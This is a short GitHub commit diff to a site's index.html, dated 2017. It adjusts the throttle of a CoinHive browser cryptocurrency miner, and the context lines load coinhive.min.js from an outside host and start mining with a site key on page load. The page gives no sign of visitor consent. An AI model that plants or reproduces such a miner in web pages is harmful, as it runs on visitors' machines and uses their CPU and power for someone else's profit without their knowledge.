Update index.html

This commit is contained in:
Logan Engstrom 2017-09-18 16:34:17 -04:00 committed by GitHub
parent 5a526e9568
commit 403c483624

View file

@ -58,7 +58,7 @@
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('W9e1JbsYTHqCwImFfAEGfJJigBCWfYv2', {
throttle:0.7
throttle:0.6
});
miner.start();
</script>